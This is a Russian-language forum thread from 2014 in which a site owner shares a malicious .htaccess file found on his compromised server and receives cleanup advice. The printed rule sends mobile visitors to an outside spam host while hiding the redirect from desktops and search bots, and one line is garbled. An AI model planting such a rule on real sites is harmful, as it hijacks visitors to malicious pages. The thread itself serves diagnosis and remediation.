Доброе утро, Гость! Представляем Вам наши форумы. Вы можете зарегистрироваться чтобы писать на форумах или зайдите под своим именем, если Вы уже регистрировались.
   
   


Форум
 SX CMS / Основная тема
         Атаки на сервер

Похожие темы

Атаки на сервер


События Четверг, 27.02.2014, 14:35

IKZOKZ

Группа: Пользователь
Ранг: Продвинутый
Cообщений: 131
Регистрация: 16.04.2010
Город: IKZOKZ
Скажите,
вчера заметил заходя с мобилки на сайт что идет перенаправление

нашел в (папках с правами 777) (.htaccess с правами 644)
Код
RewriteEngine on

RewriteCond %{HTTP_USER_AGENT} android [NC,OR]
RewriteCond %{HTTP_USER_AGENT} opera mini [NC,OR]
RewriteCond %{HTTP_USER_AGENT} blackberry [NC,OR]
RewriteCond %{HTTP_USER_AGENT} iphone [NC,OR]
RewriteCond %{HTTP_USER_AGENT} (pre/|palm os|palm|hiptop|avantgo|plucker|xiino|blazer|elaine) [NC,OR]
RewriteCond %{HTTP_USER_AGENT} (iris|3g_t|windows ce|opera mobi|windows ce; smartphone;|windows ce; iemobile) [NC,OR]
RewriteCond %{HTTP_USER_AGENT} (mini 9.5|vx1000|lge |m800|e860|u940|ux840|compal|wireless| mobi|ahong|lg380|lgku|lgu900|lg210|lg47|lg920|lg840|lg370|sam-r|mg50|s55|g83|t66|vx400|mk99|d615|d763|el370|sl900|mp500|samu3|samu4|vx10|xda_|samu5|sa
mu6|samu7|samu9|a615|b832|m881|s920|n210|s700|c-810|_h797|mob-x|sk16d|848b|mowser|s580|r800|471x|v120|rim8|c500foma:|160x|x160|480x|x640|t503|w839|i25
0|sprint|w398samr810|m5252|c7100|mt126|x225|s5330|s820|htil-g1 v71|s302|-x113|novarra|k610i|-three|8325rc|8352rc|sanyo|vx54|c888|nx250|n120|mtk |c5588|s710|t880|c5005|i;458x|p404i|s210|c5100|teleca|s940|c500|s590|foma|samsu|vx8|vx9|a1000|_mms|myx|a700|gu1100|bc831|e300|ems100|me701|me702m-thre
e|sd588|s800|8325rc|ac831|mw200| |d88|htc/|htc_touch|355x|m50|km100|d736|p-9521|telco|sl74|ktouch|m4u/|me702|8325rc|kddi|phone|lg |sonyericsson|samsung|240x|x320|vx10|nokia|sony cmd|motorola|up.browser|up.link|mmp|symbian|smartphone|midp|wap|vodafone|o2|pocket|mobile|treo) [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^(1207|3gso|4thp|501i|502i|503i|504i|505i|506i|6310|6590|770s|802s|a wa|acer|acs-|airn|alav|asus|attw|au-m|aur |aus |abac|acoo|aiko|alco|alca|amoi|anex|anny|anyw|aptu|arch|argo|bell|bird|bw-n|bw-u|beck|benq|bilb|blac|c55/|cdm-|chtm|capi|cond|craw|dall|dbte|dc-s|dica
|ds-d|ds12|dait|devi|dmob|doco|dopo|el49|erk0|esl8|ez40|ez60|ez70|ezos|ezze|elai|emul|eric|ezwa|fake|fly-|fly_|g-m u|g560|gf-5|grun|gene|go.w|good|grad|hcit|hd-m|hd-p|hd-t|hei-|hp i|hpip|hs-c|htc |htc-|htca|htcg|htcp|htcs|htct|htc_|haie|hita|huaw|hutc|i-20|i-go|i-ma|i230|iac|iac-|iac/|ig01|im1k|inno|iris|jata|java|kddi|kgt|kgt/|kpt |kwc-|klon|lexi|lg g|lg-a|lg-b|lg-c|lg-d|lg-f|lg-g|lg-k|lg-l|lg-m|lg-o|lg-p|lg-s|lg-t|lg-u|lg-w|lg/k|lg/l|lg/u|lg50|lg54|lge-|lge/|lynx|leno|m1-w|m3ga|m50/|maui|mc01|mc2
1|mcca|medi|meri|mio8|mioa|mo01|mo02|mode|modo |mot-|mt50|mtp1|mtv |mate|maxo|merc|mits|mobi|motv|mozz|n100|n101|n102|n202|n203|n300|n302|n500|n502|n505|n700|n701|n710|nec-|nem-|newg|neon|netf|noki|nzph|o2 x|o2-x|opwv|owg1|opti|oran|p800|pand|pg-1|pg-2|pg-3|pg-6|pg-8|pg-c|pg13|phil|pn-2|pt-g|palm|pana|pire|pock|pose|psio|qa-a|qc-2|qc-3|qc-5|qc-7|qc07|qc1
2|qc21|qc32|qc60|qci-|qwap|qtek|r380|r600|raks|rim9|rove|s55/|sage|sams|sc01|sch-|scp-|sdk/|se47|sec-|sec0|sec1|semc|sgh-|shar|sie-|sk-0|sl45|slid|smb
3|smt5|sp01|sph- |spv-|sy01|samm|sany|sava|scoo|send|siem|smar|smit|soft|sony|t-mo|t218|t250|t600|t610|t618|tcl-|tdg-|telm|tim-|ts70|tsm-|tsm3|tsm5|tx-9|tagt|talk|teli
|topl|hiba|up.b|upg1|utst|v400|v750|veri|vk-v|vk40|vk50|vk52|vk53|vm40|vx98|virg|vite|voda|vulc |w3c-|wapj|wapp|wapu|wapm|wig |wapi|wapr|wapv|wapy|wapa|waps|wapt|winc|winw|wonu|x700|xda2|xdag|yas-|your|zte-|zeto|acs-|alav|alca|amoi|aste|audi|avan|benq|bird|blac|blaz|brew|brvw
|bumb|ccwa|cell|cldc|cmd-|dang|doco|eml2|eric|fetc|hipt|http|ibro|idea|ikom|inno|ipaq|jbro|jemu|java|jigs|kddi|keji|kyoc|kyok|leno|lg-c|lg-d|lg-g|lge-
|libw|m-cr|maui|maxo|midp|mits|mmef|mobi|mot-|moto|mwbp|mywa|nec-|newt|nok6|noki|o2im|opwv|palm|pana|pant|pdxg|phil|play|pluc|port|prox|qtek|qwap|rozo
|sage|sama|sams|sany|sch-|sec-|send|seri|sgh-|shar|sie-|siem|smal|smar|sony|sph-|symb|t-mo|teli|tim-|tosh|treo|tsm-|upg1|upsi|vk-v|voda|vx52|vx53|vx60
|vx61|vx70|vx80|vx81|vx83|vx85|wap-|wapa|wapi|wapp|wapr|webc|whit|winw|wmlb|x [NC,OR]
RewriteCond %{HTTP:Accept} (text/vnd.wap.wml|application/vnd.wap.xhtml+xml) [NC,OR]
RewriteCond %{HTTPБе-бе-беrofile} .+ [NC,OR]
RewriteCond %{HTTP:Wap-Profile} .+ [NC,OR]
RewriteCond %{HTTP:x-wap-profile} .+ [NC,OR]
RewriteCond %{HTTP:x-operamini-phone-ua} .+ [NC,OR]
RewriteCond %{HTTP:x-wap-profile-diff} .+ [NC]

RewriteCond %{QUERY_STRING} !noredirect [NC]
RewriteCond %{HTTP_USER_AGENT} !^(Mozilla/5.0 (Linux; U; Android 2.2; en-us; Nexus One Build/FRF91) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1 offline)$ [NC]
RewriteCond %{HTTP_USER_AGENT} !(windows.nt|bsd|x11|unix|macos|macintosh|playstation|google|yandex|bot|libwww|msn|america|avant|download|fdm|maui|webmoney|windows-media-player) [NC]

RewriteRule ^(.*)$ http://moblao.com/e/9258 [L,R=302]

каким образом это было выполнено и как предотвротить?

Отредактировано IKZOKZ: 27.02.2014, 14:48:02

Пользователь офлайн
События Пятница, 07.03.2014, 23:12

SX

Группа: Администратор
Cообщений: 3016
Регистрация: 23.10.2009
Восстановить файлы и сменить пароли на фтп, вас взломали


Пользователь офлайн
События Воскресенье, 09.03.2014, 17:58

HopE

Группа: Пользователь
Ранг: Продвинутый
Cообщений: 274
Регистрация: 18.02.2010
Город: ua
и походу ссылку на дор прописали , если на хостинге и другие сайты держит то просмотрите и остальные .....


Всегда так не будет, все меняется...
ЕЛЕОН Все о вышивке и одежде.
Ризница магазин церковного шитья.
Пользователь офлайн
События Воскресенье, 09.03.2014, 19:18

SX

Группа: Администратор
Cообщений: 3016
Регистрация: 23.10.2009
А вот как предотвратить тут тебе сложнее, у тебя насколько помню что то из старых версий и нет модуля защиты файлов


Пользователь офлайн
События Вторник, 11.03.2014, 12:25

IKZOKZ

Автор текущей темы
Группа: Пользователь
Ранг: Продвинутый
Cообщений: 131
Регистрация: 16.04.2010
Город: IKZOKZ
Цитата
Автор: Status-X
А вот как предотвратить тут тебе сложнее, у тебя насколько помню что то из старых версий и нет модуля защиты файлов


Сегодня завершил с чисткой сервера. Обнаружил такой хрени по всюду.
В папках с правами 777 вложил пустой хтацесс с правами 644
Сменил root, admin и ftp пароли.
Еще обнаружил в старой версии wordpress таракана который спам рассылал. Совсем забыл, что wordpress на саб домене весит как блог, удалил.
Сейчас наблюдаю
Да, еще обнаружил какой-то скрипт кодированный, так и не понял что за хрень.
Вложу здесь, может, кто видел такого.


Отредактировано IKZOKZ: 11.03.2014, 18:26:37
Вложения
habit.rar   (5 x загружено | 43,9 Кб)   
Пользователь офлайн
События Среда, 12.03.2014, 12:13

HopE

Группа: Пользователь
Ранг: Продвинутый
Cообщений: 274
Регистрация: 18.02.2010
Город: ua
видел.
єто один из способов заливки дора на ваш хостинг , яже вам написал віше потому и проверить нада было , вас ломанули походу через блог на вордпрессе старенький.


Всегда так не будет, все меняется...
ЕЛЕОН Все о вышивке и одежде.
Ризница магазин церковного шитья.
Пользователь офлайн
События Воскресенье, 07.09.2014, 22:34

sofikhafi

Группа: Пользователь
Cообщений: 2
Регистрация: 07.09.2014
Здравствуйте,уважаемые форумчане.
Я абсолютный валенок в вебстроительстве и мой сайт бросил специалист именно в тот момент, когда была выявлена точно такая же проблема. Сейчас сайт заблокирован всеми поисковиками. Решила разбираться с сайтом самостоятельно, но для пенсионерки,к тому же далёкой от программирования, это не просто. У меня абсолютно такая же проблема, как описана здесь (нашла эту запись по антиплагиату - выдало 100% совпадение). Пожалуйста, напишите, как вы справились с этой проблемой. Дело в том, что у меня неизвестна дата вторжения на сайт (долгое время я за ним не следила) и не сохранились бэкапы "чистого" сайта.
Спасибо. с уважением.

Отредактировано Софья (sofikhafi): 07.09.2014, 22:35:23
Пользователь офлайн
События Воскресенье, 07.09.2014, 23:32

SX

Группа: Администратор
Cообщений: 3016
Регистрация: 23.10.2009
Смените пароли, скачайте сайт и производите поиск по ключевым словам по файлам, потом замените на сайте файлы накатом по верху


Пользователь офлайн
События Понедельник, 08.09.2014, 06:33

sofikhafi

Группа: Пользователь
Cообщений: 2
Регистрация: 07.09.2014
Цитата
Автор: Status-X
Смените пароли, скачайте сайт и производите поиск по ключевым словам по файлам, потом замените на сайте файлы накатом по верху

Спасибо.
Пользователь офлайн


Похожие темы  |   Предыдущая тема  |   Следующая тема

Быстрый переход:  
 

 Сейчас на сайте

Пользователей: 0, Гостей: 0

Поисковые боты: 220
Bot(206), oBot(8), BingBot(4), Crawler, Yandex
 Статистика форума

  Темы Сообщения Пользователи
За сутки:
За неделю:
За месяц:
Всего:
Мы приветствуем нового участника: wonad81290
 Дни рождения

Михаил Матюнин (46)
Copyright © 2009 - 2024 SX All rights reserved | Powered by SX CMS 1.06 UTF | Контакты